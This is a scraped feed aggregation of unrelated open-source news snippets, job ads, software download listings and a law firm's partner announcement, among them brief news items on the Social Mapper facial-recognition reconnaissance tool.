Version 1.9.0 of the SharePoint Framework Property Controls (@spfx/spfx-property-controls) has been released. This is an open source library that shares a set of reusable property pane controls, which can be used in your SharePoint Framework solutions. This release includes the following changes: Enhancements PropertyFieldCollectionData: Added custom validation for string, number, icon, and URL field types

The post PnP SharePoint Framework Property Controls v1.9.0 released appeared first on Elio Struyf.


          DevOps Engineer - Ritchie Bros. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Ritchie Bros. - Sat, 30 Jun 2018 02:48:25 GMT - View all Burnaby, BC jobs
          Senior DevOps Engineer - Long Term Contract - Ignite Technical Resources - Burnaby, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Ignite Technical Resources - Thu, 21 Jun 2018 08:15:40 GMT - View all Burnaby, BC jobs
          Development Operations Engineer - Ritchie Bros. - Vancouver, BC      Cache   Translate Page   Web Page Cache   
Integrate, manage and support a diverse range of Open Source and commercial middleware, tools, platforms and frameworks to enable continuous product delivery....
From Indeed - Wed, 08 Aug 2018 18:36:45 GMT - View all Vancouver, BC jobs
           Zimbra Web Mail Client login       Cache   Translate Page   Web Page Cache   
Zimbra provides open source server and client software for messaging and collaboration. To find out more visit https://www.zimbra....
          [مکینتاش] دانلود Brackets v1.13 MacOSX - نرم افزار ویرایشگر متن برای مک      Cache   Translate Page   Web Page Cache   

دانلود Brackets v1.13 MacOSX - نرم افزار ویرایشگر متن برای مک#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

نرم‌افزار Brackets یک ویرایشگر متن رایگان، با حجم کم و بسیار قدرتمند است، که توسط شرکت ادوبی Adobe و به وسیله HTML و CSS و Javascript تولید شده است. این ویرایشگر کد بر خلاف تمامی نرم افزارهای ادوبی به صورت منبع باز (Open Source) برای توسعه دهنده های وب ارائه شده است، که با ارائه ابزارهایی منحصر به فرد، خلاقیت شما را در زمینه ویرایش متن ارتقا می‌بخشد. انجام عملیات کدنویسی در این برنامه مدرن و کاربردی بسیار لذت‌بخش است. این نرم افزار در حال حاضر علاوه بر ویرایشگر عادی، یک ویرایشگر سریع، تنظیمات و پیش نمایش زنده از تغییرات ...


http://p30download.com/77100

مطالب مرتبط:



دسته بندی: دانلود » مکینتاش » نرم افزار » دسکتاپ, نرم افزار » توسعه, نرم افزار, نرم افزار » کاربردی
برچسب ها: , , , , , , ,
لینک های مفید: خرید کارت شارژ, شارژ مستقیم, پرداخت قبض, خرید آنتی ویروس, خرید لایسنس آنتی ویروس, تبلیغات در اینترنت, تبلیغات اینترنتی
© حق مطلب و تصویر برای پی سی دانلود محفوظ است همین حالا مشترک این پایگاه شوید!
لینک دانلود: http://p30download.com/fa/entry/77100


          Why Join an Open Source Software Foundation?      Cache   Translate Page   Web Page Cache   

Many developers often find several aspects of establishing an open source project to be overwhelming. Apart from building up the software itself, open source project developers have to ...

The post Why Join an Open Source Software Foundation? appeared first on SourceForge Community Blog.


          Peer Review Week 2018: We’re havin’ a party! : Collaborative Knowledge Foundation      Cache   Translate Page   Web Page Cache   
coko.foundation
Please join us on September 12 for what promises to be an hour of lively discussion about all of the different models of peer review our community member presenters employ, and the open source, modular tools they are building to support these within their own xPub deployments.
posted by friends:  (2)
@openscience on Twitter
@openscience: Save the date! It's going to be a week full of 'cant-miss' events! @peerrevweek coko.foundation/peer-review-we… #PRW18 #PeerReviewWeek18 @elife @hindawi @ucpress @djjmorgan @mynameissmeall @kristenratan
@scholasticahq on Twitter
@scholasticahq: Save the date! It's going to be a week full of 'cant-miss' events! @peerrevweek coko.foundation/peer-review-we… #PRW18 #PeerReviewWeek18 @elife @hindawi @ucpress @djjmorgan @mynameissmeall @kristenratan
posted by followers of the list:  (0)

          Ultracopier      Cache   Translate Page   Web Page Cache   
Ultracopier to zamiennik systemowego modułu odpowiedzialnego za kopiowanie i przenoszenie plików. Jakie są jego zalety w stosunku do standardowych funkcji wbudowanych w system Windows? Jest ich przynajmniej kilka. Jednak jedną z największych jest możliwość wygodnego zarządzania listą zadań. Całość wyposażona została w przyjazny, w pełni konfigurowalny interfejs użytkownika. Główne cechy programu: - wyświetlanie szczegółowych informacji na temat postępu przetwarzania danych, - wstrzymywanie i wznawianie zadań w dowolnym momencie, - możliwość dynamicznego modyfikowania i przeszukiwania kolejki zadań, - limitowanie prędkości kopiowania, - rozmaite opcje dotyczące silnika (rozmiar buforu, algorytm transferu, zachowywanie praw dostępu i atrybutów czasowych, automatyczne uruchamianie transferu, przenoszenie całych folderów, obsługa kolizji nazw i błędów, weryfikacja sum kontrolnych, sprawdzanie ilości wolnego miejsca na dysku itd.), - możliwość definiowania filtrów dotyczących plików i folderów (w tym obsługa wyrażeń regularnych), - zmienianie nazw kolizyjnych plików na podstawie zadanego szablonu, - wyświetlanie ostrzeżeń systemowych, - możliwość dostosowania wyglądu aplikacji do własnych potrzeb (ustawianie skórki, wyświetlanie okna w trybie "zawsze na wierzchu", pokazywanie dwóch pasków postępu), - zapisywanie szczegółowych informacji diagnostycznych dotyczących transferów, błędów i innych operacji, - minimalizacja do obszaru powiadomień, - interfejs działający z poziomu linii poleceń, - modularna budowa (możliwość korzystania z alternatywnych silników kopiowania). Ultracopier jest rozpowszechniany na zasadach Open Source (licencja GNU GPL). Projekt posiada bardzo dobrą dokumentację oraz wersje gotowe do wykorzystania na najpopularniejszych systemach operacyjnych (oprócz Windowsa, wspierane są również GNU/Linux i Mac OS X).
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Open Source At Indeed: Sponsoring Webpack      Cache   Translate Page   Web Page Cache   

Indeed is proud to announce our sponsorship of webpack. Like many other companies, Indeed uses webpack to help deliver a high-quality user experience. Because webpack is so important to our development process, we’re joining our industry peers in supporting and sponsoring the development of this critical open source technology. Rebecca Murphey, Front-End Engineering Lead at […]

The post Open Source At Indeed: Sponsoring Webpack appeared first on Indeed Engineering Blog.


          Open Source at Indeed: Sponsoring the Apache Software Foundation      Cache   Translate Page   Web Page Cache   

As Indeed continues to grow our commitment to the open source community, we are pleased to announce our sponsorship of the Apache Software Foundation. Earlier this year, we joined the Cloud Native Computing Foundation and began sponsoring the Python Software Foundation. For Indeed, this is just the beginning of our work with open source initiatives.  […]

The post Open Source at Indeed: Sponsoring the Apache Software Foundation appeared first on Indeed Engineering Blog.


          Open Source at Indeed: Sponsoring the Python Software Foundation      Cache   Translate Page   Web Page Cache   

At Indeed, we’re committed to taking a more active role in the open source community. Earlier this year, we joined the Cloud Native Computing Foundation. This week, we are pleased to announce that Indeed is sponsoring the Python Software Foundation.  We write lots of Python code at Indeed — it’s one of our major languages […]

The post Open Source at Indeed: Sponsoring the Python Software Foundation appeared first on Indeed Engineering Blog.


          Indeed Expands its Commitment to Open Source      Cache   Translate Page   Web Page Cache   

At Indeed, we’re committed to an active role in open source communities. We’re proud to announce that we’ve joined the Cloud Native Computing Foundation (CNCF), an open source software foundation dedicated to making cloud-native computing universal and sustainable. The CNCF, part of The Linux Foundation, is a vendor-neutral home for fast-growing projects. It promotes collaboration […]

The post Indeed Expands its Commitment to Open Source appeared first on Indeed Engineering Blog.


          Apache Kafka: A Framework for Handling Real-Time Data Feeds      Cache   Translate Page   Web Page Cache   
Apache Kafka: A Framework for Handling Real-Time Data Feeds

Apache Kafka is a distributed streaming platform. It is incredibly fast, which is why thousands of companies like Twitter, LinkedIn, Oracle, Mozilla and Netflix use it in production environments. It is horizontally scalable and fault tolerant. This article looks at its architecture and characteristics. Apache Kafka is a powerful asynchronous messaging technology originally developed by […]

The post Apache Kafka: A Framework for Handling Real-Time Data Feeds appeared first on Open Source For You.


          Java Developer - IAM - Codeworks - Milwaukee, WI      Cache   Translate Page   Web Page Cache   
Experience in J2EE web application development and ability to use open source libraries. Our direct client is seeking a Java Developer with experience in...
From Indeed - Thu, 02 Aug 2018 16:23:50 GMT - View all Milwaukee, WI jobs
          Nombramientos Estudio Marval O´Farrel & Mairal      Cache   Translate Page   Web Page Cache   







Marval promotes three to partner


 Marval, O’Farrell & Mairal promoted three senior associates to partner: Diego Fernandez, Gustavo Morales Oliver andMartín Mosteirin. These promotions strengthen the development of three of the firm’s most innovative, cutting-edge practice areas: Information Technology & Privacy; Compliance, Anticorruption & Investigations; and Life Sciences. The new partners already have a wealth of experience and are highly specialized in their respective areas of expertise:


  • Diego Fernández is a technology expert, with 14 years of experience. His wide range of expertise includes IT law, software licensing, E-commerce, IT agreements, due diligence and IT compliance, privacy, data protection, cyber security, Internet law, and cloud computing. Diego is ranked as a leading lawyer in the Argentina TMT section of Chambers Latin America. He has a Master’s in Information Technology and Privacy Law from The John Marshall Law School, Chicago, and is a former foreign associate in the IT & Privacy group at Foley & Lardner, Chicago. He is also a Board Member and Vice-Chair of the South America Committee of the International Technology Law Association (ITechLaw), co-chair of the Argentina Chapter of International Association of Privacy Professionals (IAPP), and member of the Technology Committee of the IBA, the Internet Committee of the INTA, and the Open Source Software Committee of the ABA.


  • Gustavo Morales Oliver is a key member of Marval’s compliance and anti-corruption practice. He is fully dedicated to this practice area, giving him unique, hands-on experience of compliance programs, investigations and related litigation. He has advised international companies from a range of industries and participated in many local and international investigations and cases in this highly specialized field. Gustavo teaches Compliance at the Universidad Torcuato Di Tella Law School. He earned an LL.M. from the University of Illinois and is admitted to practice in both Argentina and New York, USA.


  • Martín Mosteirin advises leading multinational companies on regulatory strategies and compliance in the pharmaceutical, healthcare, biotech, medical and medical-technology devices, dental products, cosmetics, toiletries and perfumes, household cleaning products and food sectors. He has strong expertise in both contentious and non-contentious matters. Martín holds postgraduate qualifications in Pharmaceutical Regulatory Matters and Corporate Advice on the International Trade of Goods, Financial Operations and Payment Methods in Contemporary Commercial Law.

Santiago Carregal, chair of Marval, O’Farrell & Mairal’s executive board, commented on the announcement: “These latest promotions demonstrate Marval’s commitment to developing the Argentine legal market and maintaining the firm’s position at the forefront of legal services in the country. We are proud to enhance these innovative practice areas with the promotions of Diego, Gustavo and Martín. All three have outstanding careers in their fields and offer counsel of the highest quality. Marval continues strengthening its leadership in Argentina and expanding its practice to non-traditional areas in order to grant a genuinely full-service offering that is unique in the Argentine market.”

Marval nombró tres nuevos socios
El 1 de agosto de 2018, Marval, O’Farrell & Mairal nombró socios a tres de sus asociados senior: Diego Fernández, Gustavo Morales Oliver y Martín Mosteirin. Con estas promociones, el Estudio impulsa el desarrollo de tres novedosas áreas de práctica: Tecnologías de la Información y Privacidad; Compliance, Anticorrupción e Investigaciones, y Biociencias. Los nuevos socios tienen amplia experiencia y sólida formación en su especialidad.


  • Diego Fernández: Experto en tecnología, con 14 años de experiencia. Cuenta con una amplia expertise que incluye derecho de tecnología de la información, licencias de software, e-commerce, acuerdos de IT, due diligence y compliance IT, privacidad, protección de datos, ciberseguridad, derecho de internet y cloud computing. Diego ha sido reconocido como un abogado líder de TMT en Argentina en Chambers Latin America. Completó un máster en Tecnologías de la Información y Privacidad en The John Marshall Law School, Chicago, y trabajó como abogado extranjero del área de práctica de IT & Privacidad en Foley & Lardner, Chicago. Es miembro del Directorio y presidente del Comité de Sudamérica de la International Technology Law Association (ITechLaw), vicepresidente del capítulo Buenos Aires KnowledgeNet de la International Association of Privacy Professionals (IAPP), miembro del Comité de Tecnología de la  International Bar Association (IBA), del Comité de Internet de la International Trademark Association (INTA), y miembro del Comité de Software Open Source de la American Bar Association (ABA).


  • Gustavo Morales Oliver: Miembro fundamental del área de práctica de Compliance y Anticorrupción, Gustavo dedica el 100 % de su tiempo a esta práctica, por lo que cuenta con una experiencia única y activa en programas de compliance, investigaciones y litigios relacionados. 

          PREMER: A Tool to Infer Biological Networks      Cache   Translate Page   Web Page Cache   
Inferring the structure of unknown cellular networks is a main challenge in computational biology. Data-driven approaches based on information theory can determine the existence of interactions among network nodes automatically. However, the elucidation of certain features—such as distinguishing between direct and indirect interactions or determining the direction of a causal link—requires estimating information-theoretic quantities in a multidimensional space. This can be a computationally demanding task, which acts as a bottleneck for the application of elaborate algorithms to large-scale network inference problems. The computational cost of such calculations can be alleviated by the use of compiled programs and parallelization. To this end, we have developed PREMER (Parallel Reverse Engineering with Mutual information & Entropy Reduction), a software toolbox that can run in parallel and sequential environments. It uses information theoretic criteria to recover network topology and determine the strength and causality of interactions, and allows incorporating prior knowledge, imputing missing data, and correcting outliers. PREMER is a free, open source software tool that does not require any commercial software. Its core algorithms are programmed in FORTRAN 90 and implement OpenMP directives. It has user interfaces in Python and MATLAB/Octave, and runs on Windows, Linux, and OSX (https://sites.google.com/site/premertoolbox/).
          Particle CEO Zach Supalla Talks the Reality of IoT      Cache   Translate Page   Web Page Cache   

The Internet of Things is slowly working its way into our lives, to the point where we’ll just call them Things. With so many software projects, open source tools, and hardware devices out there, it can be tough to even make the distinction between a modern sprinkler system and one that is internet-enabled: non-internet-enabled devices […]

The post Particle CEO Zach Supalla Talks the Reality of IoT appeared first on The New Stack.


          Microservices Monitor Prometheus Emerges from CNCF Incubation      Cache   Translate Page   Web Page Cache   

Software originally created by SoundCloud to monitor a complex set of dynamically-provisioned software services has graduated from an incubation program sponsored by the Cloud Native Computing Foundation (CNCF). Prometheus is the second open source software program to graduate from the CNCF, following the Kubernetes open source container orchestration engine, originally developed by Google. The CNCF announced the graduation at the annual […]

The post Microservices Monitor Prometheus Emerges from CNCF Incubation appeared first on The New Stack.


          (USA-OR-Beaverton) Senior Software Engineer      Cache   Translate Page   Web Page Cache   
Become a Part of the NIKE, Inc. Team NIKE, Inc. does more than outfit the world's best athletes. It is a place to explore potential, obliterate boundaries and push out the edges of what can be. The company looks for people who can grow, think, dream and create. Its culture thrives by embracing diversity and rewarding imagination. The brand seeks achievers, leaders and visionaries. At Nike, it’s about each person bringing skills and passion to a challenging and constantly evolving game. Nike Technology designs, creates and implements the methods and tools needed to make the world’s largest sports brand run faster, smarter and more securely. Global Technology teams aggressively innovate the solutions needed to help employees navigate Nike's rapidly evolving landscape. From infrastructure to security and supply chain operations, Technology specialists drive growth through top-flight hardware, software and enterprise applications. Simply put, without Nike Technology, there are no Nike products. **Description** We are looking for a software development engineers who excel in team environments and are excited about building cloud native platforms that can scale with the demand of our business. SCOPE & RESPONSIBILITIES + Evangelize and cultivate adoption of Enterprise Platforms, open source software and agile principles within the organization + Ensure solutions are designed and developed using a scalable, highly resilient cloud native architecture + Deliver well-documented and well-tested code, and participate in peer code reviews + Design and develop tools and frameworks to improve security, reliability, maintainability, availability and performance for the technology foundation of our platform + Ensure product and technical features are delivered to spec and on-time + Collaborate with and consult other Nike development teams + Explain designs and constraints to stakeholders and technical teams + Assist in the support and operation of the platforms you help build + Work with product management to support product / service scoping activities + Work with leadership to define delivery schedules of key features through an agile framework + Be a key contributor to overall architecture, framework and design of enterprise platforms **Qualifications** + Masters’ or Bachelors' degree in Computer Science or a related field + 5+ years of experience in large-scale software development + 5+ years of experience architecting and building scalable data architecture + Prefer 5 or more years of hands-on experience with AWS, Azure, GCP or similar cloud platform + 5+ years of development experience in languages like Golang, Python, Ruby, Java, Scala or Node.js + Expertise with front-end development using JavaScript frameworks (React, Angular, etc), HTML and CSS a plus + Experience with securing RESTful APIs and Apps using OAuth, OpenID Connect, and JWT a plus + Experience with both relational and No-SQL databases + Exposure to Docker, Kubernetes or other container technologies + Experience with participating in projects in a highly collaborative, multi-discipline development team environment + Exposure to Agile and test-driven development + Exposure to hierarchical and distributed code repository management tools like GIT + Great communications skills **Qualifications** + Masters’ or Bachelors' degree in Computer Science or a related field + 5+ years of experience in large-scale software development + 5+ years of experience architecting and building scalable data architecture + Prefer 5 or more years of hands-on experience with AWS, Azure, GCP or similar cloud platform + 5+ years of development experience in languages like Golang, Python, Ruby, Java, Scala or Node.js + Expertise with front-end development using JavaScript frameworks (React, Angular, etc), HTML and CSS a plus + Experience with securing RESTful APIs and Apps using OAuth, OpenID Connect, and JWT a plus + Experience with both relational and No-SQL databases + Exposure to Docker, Kubernetes or other container technologies + Experience with participating in projects in a highly collaborative, multi-discipline development team environment + Exposure to Agile and test-driven development + Exposure to hierarchical and distributed code repository management tools like GIT + Great communications skills NIKE, Inc. is a growth company that looks for team members to grow with it. Nike offers a generous total rewards package, casual work environment, a diverse and inclusive culture, and an electric atmosphere for professional development. No matter the location, or the role, every Nike employee shares one galvanizing mission: To bring inspiration and innovation to every athlete* in the world. NIKE, Inc. is committed to employing a diverse workforce. Qualified applicants will receive consideration without regard to race, color, religion, sex, national origin, age, sexual orientation, gender identity, gender expression, veteran status, or disability. **Job ID:** 00401843 **Location:** United States-Oregon-Beaverton **Job Category:** Technology
          Integrated Reporting, Open Source Security, Washington State Parks, More: Thursday Afternoon Buzz, August 9, 2018      Cache   Translate Page   Web Page Cache   
NEW RESOURCES Business Green: New database to highlight benefits of integrated reporting. “The free database includes a wide range of studies and papers exploring how integrated reporting that brings together financial and […]
          OSS Leftovers      Cache   Translate Page   Web Page Cache   
  • Open source Kaa IoT middleware to take on enterprise IoT

    To benefit from IoT, businesses need a way to network, manage and secure all of their connected devices. While there are proprietary IoT middleware platforms available to do this for the home and heavy industries like manufacturing, the Kaa IoT platform is one of the few open source options on the market today that is business-ready.

  • bzip.org changes hands

    The bzip2 compression algorithm has been slowly falling out of favor, but is still used heavily across the net. A search for "bzip2 source" returns bzip.org as the first three results. But it would seem that the owner of this domain has let it go, and it is now parked and running ads. So we no longer have an official home for bzip2.

  • Three Capabilities Banks Need to Work On While Adopting Open Source

    As banks are now willing to experiment and adopt new age technologies such as artificial intelligence and blockchain, the next big step of its digital disruption has to do with open source banking.

    With the adoption of open source, banks are likely to open their APIs and share customer data with third-party players to develop innovative products and offer customized real-time bespoke services to customers.

    Industry experts consider it to be the best time to embrace open banking as customer buying patterns are changing.

    In a previous interaction with Entrepreneur India, Rajeev Ahuja, Executive Director, RBL Bank accredited this change to “the emergence of nontraditional competition such as fintech startups, growing domination of technologies like blockchain, artificial intelligences, machine learning, etc and lastly, the initiatives taken by the Reserve Bank Of India to regulated the payments banks, peer to peer lending platforms, linking of Aadhar, and e-kyc.”

  • Free and open-source software con returns to International House

    FOSSCon, a free and open-source software conference, will be held Aug. 25 at the International House Philadelphia. Lectures and workshops will teach participants about free software and new ways to use it.

    Unlike most software, which is only available under restrictive licensing, free and open-source software is available under licenses that let people distribute, run and modify the software for their own purposes. It includes well-known projects like the Firefox browser or the Linux kernel. Those who talk about “free software” emphasize the way copyright law restricts users’ freedom, while those who talk about “open source” emphasize the economic and technical benefits of shared development.

    However, most of the scheduled events are far from philosophical, focusing on technical subjects like the use of domain name systems or the filesystem ZFS. The speakers range from professional programmers to enthusiasts. Most famous on the list is Eric S. Raymond, one of the thinkers behind “open source,” who will speak about the history of the C programming language and what might replace it. Of particular local interest is a talk by Eric O’Callaghan, a systems administrator at Thomas Jefferson University, on how to use public data from Indego Bike Share.


          Social Mapper Debut      Cache   Translate Page   Web Page Cache   
  • Social Mapper: A free tool for automated discovery of targets’ social media accounts

    The tool takes advantage of facial recognition technology and searches for targets’ accounts on LinkedIn, Facebook, Twitter, Google+, Instagram, VKontakte, Weibo and Douban.

  • Social Mapper uses facial recognition to track 'targets' on social media

    RESEARCHERS at US security company Trustwave have released a rather scary new open source tool called 'Social Mapper' that can be used to track "targets" across social media networks using facial recognition.

    The potentially-devious tool works by taking an "automated approach" to searching popular social media sites for names and pictures of people you're looking to track. It can accurately detect and group a person's presence, outputting the results into a report that a human operator can quickly review.

    "Performing intelligence gathering is a time-consuming process, it typically starts by attempting to find a person's online presence on a variety of social media sites," the company asked itself in a news release announcing the software.

  • Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media

    There are tons of automated tools and services that any shady hacker can employ to grab the public data on Facebook, Twitter, Google, or Instagram, and use it for notorious purposes. But what about the ethical hackers and security researchers who are looking for a means to achieve the same?

    To tackle this issue, security firm Trustwave has released an open source tool that can reduce the time being consumed for such intelligence collection process at a large scale. Called Social Mapper, the tool uses facial recognition to connect the dots on different social media and collect data.

  • Need a facial recognition auto-doxxx tool? Social Mapper has you covered

    Finding people's social media profiles can be a slow and manual business – so why not get facial recognition to help?

    That's the pitch coming from Trustwave's SpiderLabs, which wants to make life easier for penetration testers trying to infiltrate clients' networks and facilities using social engineering and targeted hackery.

    SpiderLabs' Jacob Wilkin explained that new tool Social Mapper can start with the name of an organisation on LinkedIn, a folder full of named images, or a CSV listing of names with URLs to images. With those inputs, he explained this week, the software's facial recognition capabilities can “correlate social media profiles across a number of different sites on a large scale.”


          UX Developer Lead, Themes - Shopify - Montréal, QC      Cache   Translate Page   Web Page Cache   
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          calibre Portable 3.29 (ebook manager, viewer, converter)